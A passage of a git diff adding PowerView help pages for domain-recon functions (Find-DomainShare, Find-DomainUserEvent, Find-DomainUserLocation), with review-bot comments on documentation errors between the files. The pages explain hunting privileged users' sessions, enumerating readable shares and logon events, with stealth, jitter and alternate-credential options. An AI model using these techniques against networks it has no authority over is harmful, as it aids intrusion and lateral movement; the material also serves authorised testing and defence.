+Specifies an LDAP query string that is used to search for computer objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSearchBase
+Specifies the LDAP source to search through for computers,
+e.g.
+"LDAP://OU=secret,DC=testlab,DC=local".
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerUnconstrained
+Switch.
+Search computer objects that have unconstrained delegation.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: Unconstrained
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerOperatingSystem
+Search computers with a specific operating system, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: OperatingSystem
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerServicePack
+Search computers with a specific service pack, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServicePack
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSiteName
+Search computers in the specific AD Site name, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: SiteName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ProcessName
+Search for processes with one or more specific names.
+
+```yaml
+Type: String[]
+Parameter Sets: TargetProcess
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserIdentity
+Specifies one or more user identities to search for.
+
+```yaml
+Type: String[]
+Parameter Sets: UserIdentity, TargetUser
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserDomain
+Specifies the domain to query for users to search for, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: TargetUser
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserLDAPFilter
+Specifies an LDAP query string that is used to search for target users.
+
+```yaml
+Type: String
+Parameter Sets: TargetUser
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserSearchBase
+Specifies the LDAP source to search through for target users.
+e.g.
+"LDAP://OU=secret,DC=testlab,DC=local".
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: TargetUser
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserGroupIdentity
+Specifies a group identity to query for target users, defaults to 'Domain Admins.
+If any other user specifications are set, then UserGroupIdentity is ignored.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: GroupName, Group
+
+Required: False
+Position: Named
+Default value: Domain Admins
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserAdminCount
+Switch.
+Search for users users with '(adminCount=1)' (meaning are/were privileged).
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: TargetUser
+Aliases: AdminCount
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain and target systems.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -StopOnSuccess
+Switch.
+Stop hunting after finding after finding a target user.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Delay
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Jitter
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
+
+```yaml
+Type: Double
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0.3
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Threads
+The number of threads to use for user searching, defaults to 20.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 20
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.UserProcess
+
+## NOTES
+
+## RELATED LINKS
+
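Review bot: EXAMPLE 4 of Find-DomainProcess.md has the same split fence as the other multi-line examples in this commit: the code block closes after `$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force`, so `$Cred = New-Object ...` and `Find-DomainProcess -Domain testlab.local -Credential $Cred` render as plain text; move the closing fence below the last command. Text fixes in the same file: EXAMPLE 3's description reads "Searchings for instances"; EXAMPLE 4's reads "in the testlab.local using" (missing "domain"); -UserGroupIdentity has an unclosed quote in `defaults to 'Domain Admins.`; -UserAdminCount says "Search for users users"; -StopOnSuccess says "after finding after finding"; -Threads describes "user searching" although the function hunts processes; and the OUTPUTS entry `### PowerView.UserProcess` has no description line, unlike the other files in this commit. The -ServerTimeLimit mismatch (text says 120 seconds, yaml says `Default value: 0`) recurs here as well.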
diff --git a/docs/Recon/Find-DomainShare.md b/docs/Recon/Find-DomainShare.md new file mode 100755 index 0000000..71274b7 --- /dev/null +++ b/docs/Recon/Find-DomainShare.md @@ -0,0 +1,335 @@ +# Find-DomainShare
+
+## SYNOPSIS
+Searches for computer shares on the domain.
+If -CheckShareAccess is passed,
+then only shares the current user has read access to are returned.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, New-ThreadedFunction
+
+## SYNTAX
+
+```
+Find-DomainShare [[-ComputerName] <String[]>] [-ComputerDomain <String>] [-ComputerLDAPFilter <String>]
+ [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>]
+ [-ComputerSiteName <String>] [-CheckShareAccess] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+ [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
+```
+
+## DESCRIPTION
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and enumerates the available shares for each
+machine with Get-NetShare.
+If -CheckShareAccess is passed, then
+\[IO.Directory\]::GetFiles() is used to check if the current user has read
+access to the given share.
+If -Credential is passed, then
+Invoke-UserImpersonation is used to impersonate the specified user before
+enumeration, reverting after with Invoke-RevertToSelf.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-DomainShare
+```
+
+Find all domain shares in the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-DomainShare -CheckShareAccess
+```
+
+Find all domain shares in the current domain that the current user has
+read access to.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-DomainShare -Domain testlab.local -Credential $Cred
+
+Searches for domain shares in the testlab.local domain using the specified alternate credentials.
+
+## PARAMETERS
+
+### -ComputerName
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DNSHostName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -ComputerDomain
+Specifies the domain to query for computers, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Domain
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerLDAPFilter
+Specifies an LDAP query string that is used to search for computer objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSearchBase
+Specifies the LDAP source to search through for computers,
+e.g.
+"LDAP://OU=secret,DC=testlab,DC=local".
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerOperatingSystem
+Search computers with a specific operating system, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: OperatingSystem
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerServicePack
+Search computers with a specific service pack, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServicePack
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSiteName
+Search computers in the specific AD Site name, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: SiteName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -CheckShareAccess
+Switch.
+Only display found shares that the local user has access to.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: CheckAccess
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain and target systems.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Delay
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Jitter
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
+
+```yaml
+Type: Double
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0.3
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Threads
+The number of threads to use for user searching, defaults to 20.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 20
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ShareInfo
+
+## NOTES
+
+## RELATED LINKS
+
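Review bot: Example 3 closes its code fence after the first line, so `$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)` and `Find-DomainShare -Domain testlab.local -Credential $Cred` render as prose instead of code; move the closing ``` below the Find-DomainShare line. The -ServerTimeLimit entry contradicts itself: the text says "Default of 120 seconds." while the YAML block says "Default value: 0", so one of the two should be corrected to match the function's actual default. -Threads is described as "threads to use for user searching", but here they drive share enumeration, and -CheckShareAccess says "the local user" where the SYNOPSIS and DESCRIPTION say "the current user"; make the wording consistent. Worth a caveat in DESCRIPTION as well: `[IO.Directory]::GetFiles()` only proves the caller can list the share root, so a share that allows listing but denies reading of its files will still be reported as readable.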
diff --git a/docs/Recon/Find-DomainUserEvent.md b/docs/Recon/Find-DomainUserEvent.md new file mode 100755 index 0000000..12e64a9 --- /dev/null +++ b/docs/Recon/Find-DomainUserEvent.md @@ -0,0 +1,451 @@ +# Find-DomainUserEvent
+
+## SYNOPSIS
+Finds logon events on the current (or remote domain) for the specified users.
+
+Author: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainUser, Get-DomainGroupMember, Get-DomainController, Get-DomainUserEvent, New-ThreadedFunction
+
+## SYNTAX
+
+### Domain (Default)
+```
+Find-DomainUserEvent [-Domain <String>] [-Filter <Hashtable>] [-StartTime <DateTime>] [-EndTime <DateTime>]
+ [-MaxEvents <Int32>] [-UserIdentity <String[]>] [-UserDomain <String>] [-UserLDAPFilter <String>]
+ [-UserSearchBase <String>] [-UserGroupIdentity <String[]>] [-UserAdminCount] [-CheckAccess] [-Server <String>]
+ [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]
+ [-Credential <PSCredential>] [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
+```
+
+### ComputerName
+```
+Find-DomainUserEvent [[-ComputerName] <String[]>] [-Filter <Hashtable>] [-StartTime <DateTime>]
+ [-EndTime <DateTime>] [-MaxEvents <Int32>] [-UserIdentity <String[]>] [-UserDomain <String>]
+ [-UserLDAPFilter <String>] [-UserSearchBase <String>] [-UserGroupIdentity <String[]>] [-UserAdminCount]
+ [-CheckAccess] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>]
+ [-Tombstone] [-Credential <PSCredential>] [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>]
+ [-Threads <Int32>]
+```
+
+## DESCRIPTION
+Enumerates all domain controllers from the specified -Domain
+(default of the local domain) using Get-DomainController, enumerates
+the logon events for each using Get-DomainUserEvent, and filters
+the results based on the targeting criteria.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-DomainUserEvent
+```
+
+Search for any user events matching domain admins on every DC in the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$cred = Get-Credential dev\administrator
+```
+
+Find-DomainUserEvent -ComputerName 'secondary.dev.testlab.local' -UserIdentity 'john'
+
+Search for any user events matching the user 'john' on the 'secondary.dev.testlab.local'
+domain controller using the alternate credential
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+'primary.testlab.local | Find-DomainUserEvent -Filter @{'IpAddress'='192.168.52.200|192.168.52.201'}
+```
+
+Find user events on the primary.testlab.local system where the event matches
+the IPAddress '192.168.52.200' or '192.168.52.201'.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$cred = Get-Credential testlab\administrator
+```
+
+Find-DomainUserEvent -Delay 1 -Filter @{'LogonGuid'='b8458aa9-b36e-eaa1-96e0-4551000fdb19'; 'TargetLogonId' = '10238128'; 'op'='&'}
+
+Find user events mathing the specified GUID AND the specified TargetLogonId, searching
+through every domain controller in the current domain, enumerating each DC in serial
+instead of in a threaded manner, using the alternate credential.
+
+## PARAMETERS
+
+### -ComputerName
+Specifies an explicit computer name to retrieve events from.
+
+```yaml
+Type: String[]
+Parameter Sets: ComputerName
+Aliases: dnshostname, HostName, name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies a domain to query for domain controllers to enumerate.
+Defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: Domain
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Filter
+A hashtable of PowerView.LogonEvent properties to filter for.
+The 'op|operator|operation' clause can have '&', '|', 'and', or 'or',
+and is 'or' by default, meaning at least one clause matches instead of all.
+See the exaples for usage.
+
+```yaml
+Type: Hashtable
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -StartTime
+The \[DateTime\] object representing the start of when to collect events.
+Default of \[DateTime\]::Now.AddDays(-1).
+
+```yaml
+Type: DateTime
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [DateTime]::Now.AddDays(-1)
+Accept pipeline input: True (ByPropertyName)
+Accept wildcard characters: False
+```
+
+### -EndTime
+The \[DateTime\] object representing the end of when to collect events.
+Default of \[DateTime\]::Now.
+
+```yaml
+Type: DateTime
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [DateTime]::Now
+Accept pipeline input: True (ByPropertyName)
+Accept wildcard characters: False
+```
+
+### -MaxEvents
+The maximum number of events (per host) to retrieve.
+Default of 5000.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 5000
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserIdentity
+Specifies one or more user identities to search for.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserDomain
+Specifies the domain to query for users to search for, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserLDAPFilter
+Specifies an LDAP query string that is used to search for target users.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserSearchBase
+Specifies the LDAP source to search through for target users.
+e.g.
+"LDAP://OU=secret,DC=testlab,DC=local".
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserGroupIdentity
+Specifies a group identity to query for target users, defaults to 'Domain Admins.
+If any other user specifications are set, then UserGroupIdentity is ignored.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: GroupName, Group
+
+Required: False
+Position: Named
+Default value: Domain Admins
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserAdminCount
+Switch.
+Search for users users with '(adminCount=1)' (meaning are/were privileged).
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: AdminCount
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -CheckAccess
+{{Fill CheckAccess Description}}
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target computer(s).
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -StopOnSuccess
+Switch.
+Stop hunting after finding after finding a target user.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Delay
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Jitter
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
+
+```yaml
+Type: Double
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0.3
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Threads
+The number of threads to use for user searching, defaults to 20.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 20
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.LogonEvent
+
+PowerView.ExplicitCredentialLogon
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/](http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/)
+
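Review bot: Examples 2 and 4 build `$cred = Get-Credential ...` but the commands that follow never pass `-Credential $cred`, while the text claims they run "using the alternate credential"; either add the parameter to the command or drop the credential line. In the same examples the code fence closes after the first line, leaving the Find-DomainUserEvent invocation as plain text, and Example 3 has an unbalanced quote in `'primary.testlab.local | Find-DomainUserEvent -Filter @{...}` (drop the leading apostrophe or close it). The -CheckAccess entry still carries the platyPS placeholder "{{Fill CheckAccess Description}}" and needs a real description. Smaller fixes: "mathing" (matching) in Example 4, "exaples" (examples) under -Filter, "'Domain Admins." is missing its closing quote under -UserGroupIdentity, "users users" under -UserAdminCount, "after finding after finding" under -StopOnSuccess, -SearchScope says "scope to search under for computers" although this function searches for users and domain controllers, -ServerTimeLimit text says 120 seconds while the YAML says "Default value: 0", and in OUTPUTS "PowerView.ExplicitCredentialLogon" should be its own "###" heading like PowerView.LogonEvent.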
diff --git a/docs/Recon/Find-DomainUserLocation.md b/docs/Recon/Find-DomainUserLocation.md new file mode 100755 index 0000000..0d200aa --- /dev/null +++ b/docs/Recon/Find-DomainUserLocation.md @@ -0,0 +1,579 @@ +# Find-DomainUserLocation
+
+## SYNOPSIS
+Finds domain machines where specific users are logged into.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainFileServer, Get-DomainDFSShare, Get-DomainController, Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetSession, Test-AdminAccess, Get-NetLoggedon, Resolve-IPAddress, New-ThreadedFunction
+
+## SYNTAX
+
+### UserGroupIdentity (Default)
+```
+Find-DomainUserLocation [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]
+ [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]
+ [-UserDomain <String>] [-UserLDAPFilter <String>] [-UserSearchBase <String>] [-UserGroupIdentity <String[]>]
+ [-UserAdminCount] [-UserAllowDelegation] [-CheckAccess] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+ [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Stealth] [-StealthSource <String>] [-Threads <Int32>]
+```
+
+### UserIdentity
+```
+Find-DomainUserLocation [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]
+ [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]
+ [-UserIdentity <String[]>] [-UserDomain <String>] [-UserLDAPFilter <String>] [-UserSearchBase <String>]
+ [-UserAdminCount] [-UserAllowDelegation] [-CheckAccess] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+ [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Stealth] [-StealthSource <String>] [-Threads <Int32>]
+```
+
+### ShowAll
+```
+Find-DomainUserLocation [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]
+ [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]
+ [-UserDomain <String>] [-UserLDAPFilter <String>] [-UserSearchBase <String>] [-UserAdminCount]
+ [-UserAllowDelegation] [-CheckAccess] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>] [-StopOnSuccess] [-Delay <Int32>]
+ [-Jitter <Double>] [-ShowAll] [-Stealth] [-StealthSource <String>] [-Threads <Int32>]
+```
+
+## DESCRIPTION
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and queries the domain for users of a specified group
+(default 'Domain Admins') with Get-DomainGroupMember.
+Then for each server the
+function enumerates any active user sessions with Get-NetSession/Get-NetLoggedon
+The found user list is compared against the target list, and any matches are
+displayed.
+If -ShowAll is specified, all results are displayed instead of
+the filtered set.
+If -Stealth is specified, then likely highly-trafficed servers
+are enumerated with Get-DomainFileServer/Get-DomainController, and session
+enumeration is executed only against those servers.
+If -Credential is passed,
+then Invoke-UserImpersonation is used to impersonate the specified user
+before enumeration, reverting after with Invoke-RevertToSelf.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-DomainUserLocation
+```
+
+Searches for 'Domain Admins' by enumerating every computer in the domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-DomainUserLocation -Stealth -ShowAll
+```
+
+Enumerates likely highly-trafficked servers, performs just session enumeration
+against each, and outputs all results.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Find-DomainUserLocation -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local
+```
+
+Enumerates Windows 7 computers in dev.testlab.local and returns user results for privileged
+users in dev.testlab.local.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
